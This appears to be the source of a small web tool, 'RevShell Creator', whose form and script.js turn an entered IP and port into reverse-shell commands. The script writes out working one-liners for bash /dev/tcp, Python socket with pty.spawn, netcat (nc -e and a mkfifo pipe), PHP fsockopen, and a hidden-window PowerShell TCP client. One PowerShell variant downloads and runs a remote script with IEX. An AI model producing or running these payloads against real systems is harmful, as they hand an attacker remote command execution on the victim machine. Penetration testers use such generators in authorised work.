├── favicon.ico ├── index.html └── script.js /favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/ReverseShell-Creator/HEAD/favicon.ico -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | RevShell Creator - S12 5 | 6 | 7 | 8 | 9 | 10 |

11 |
Online Reverse Shell Generator
12 |

13 |

Enter the following data:

14 |

IP:

15 | 16 |

PORT:

17 | 18 |

TYPE:

19 | 29 |
30 |
31 | 32 |

33 |
Result
34 |

35 | 36 | -------------------------------------------------------------------------------- /script.js: -------------------------------------------------------------------------------- 1 | document.addEventListener('DOMContentLoaded', function () { 2 | const ip = document.getElementById('ip') 3 | const port = document.getElementById('port') 4 | const type = document.getElementById('type') 5 | const submit = document.getElementById('submit') 6 | 7 | submit.onclick = function () { 8 | if (ip.value === '' | port.value === '' | type.value === '') { 9 | alert('Arguments Missing') 10 | } 11 | else { 12 | if (type.value === 'bash') { 13 | document.write('Option 1:',"
") 14 | document.write('bash -i >& /dev/tcp/',ip.value,'/',port.value,' 0>&1') 15 | } 16 | if (type.value === 'python') { 17 | const vaina = "/bin/bash" 18 | document.write('Option 1:',"
") 19 | document.write("python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"",ip.value,"\",",port.value,"));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"",vaina,"\")'","
") 20 | document.write('Option 2:',"
") 21 | document.write("python2 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"",ip.value,"\",",port.value,"));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"",vaina,"\")'") 22 | } 23 | if (type.value === 'netcat') { 24 | document.write('Option 1:',"
") 25 | document.write('nc -e /bin/sh ',ip.value," ", port.value,"
") 26 | document.write('Option 2:',"
") 27 | document.write('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ',ip.value,' ',port.value,' >/tmp/f') 28 | } 29 | if (type.value === 'php') { 30 | const vaina = "/bin/bash" 31 | document.write('Option 1:',"
") 32 | document.write("php -r '$sock=fsockopen(\"",ip.value,"\",",port.value,");exec(\"",vaina," -i <&3 >&3 2>&3\");'") 33 | } 34 | if (type.value === 'powershell') { 35 | document.write('Option 1:',"
") 36 | document.write('powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"',ip.value,'\",',port.value,');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()',"
") 37 | document.write('Option 2:',"
") 38 | document.write("powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')") 39 | } 40 | if (type.value === 'icmp') { 41 | document.write('Working in this reverse shell...') 42 | } 43 | if (type.value === 'dns') { 44 | document.write('Working in this reverse shell...') 45 | } 46 | } 47 | } 48 | }) --------------------------------------------------------------------------------